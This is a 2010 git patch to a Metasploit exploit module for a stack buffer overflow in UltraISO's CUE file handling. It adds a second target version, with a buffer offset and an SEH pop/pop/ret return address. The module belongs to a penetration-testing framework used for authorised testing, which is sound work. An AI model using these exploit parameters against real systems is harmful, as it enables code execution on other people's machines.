From b2f3e91c8b948215e4cad48c0cde9af8e888e331 Mon Sep 17 00:00:00 2001
From: Joshua Drake <github.jdrake@qoop.org>
Date: Mon, 29 Mar 2010 18:19:59 +0000
Subject: [PATCH] add a target for v8.6.0.1936

git-svn-id: file:///home/svn/framework3/trunk@8955 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/exploits/windows/fileformat/ultraiso_cue.rb | 12 ++++++++----
 1 file changed, 8 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/fileformat/ultraiso_cue.rb b/modules/exploits/windows/fileformat/ultraiso_cue.rb
index ed7f2cdba3..755ba5793b 100644
--- a/modules/exploits/windows/fileformat/ultraiso_cue.rb
+++ b/modules/exploits/windows/fileformat/ultraiso_cue.rb
@@ -50,21 +50,25 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					# Tested OK on:
-					# v8.6.2.2011 (portable)
-
 					# BOF @ 0x005e1f8b
 
 					# The EXE base addr contains a bad char (nul). This prevents us from
 					# using the super-elite multi-offset SEH exploitation method.
 
-					[ 'Windows Universal',
+					[ 'Windows - UltraISO v8.6.2.2011 portable',
 						{
 							'Offset' => 1100,
 							'JmpOff' => 0x30,   # offset from the end to our jmp
 							'Ret' => 0x00594740 # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe
 						}
 					],
+					[ 'Windows - UltraISO v8.6.0.1936',
+						{
+							'Offset' => 1100,
+							'JmpOff' => 0x30,   # offset from the end to our jmp
+							'Ret' => 0x0059170c # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe
+						}
+					],
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => 'May 24 2007',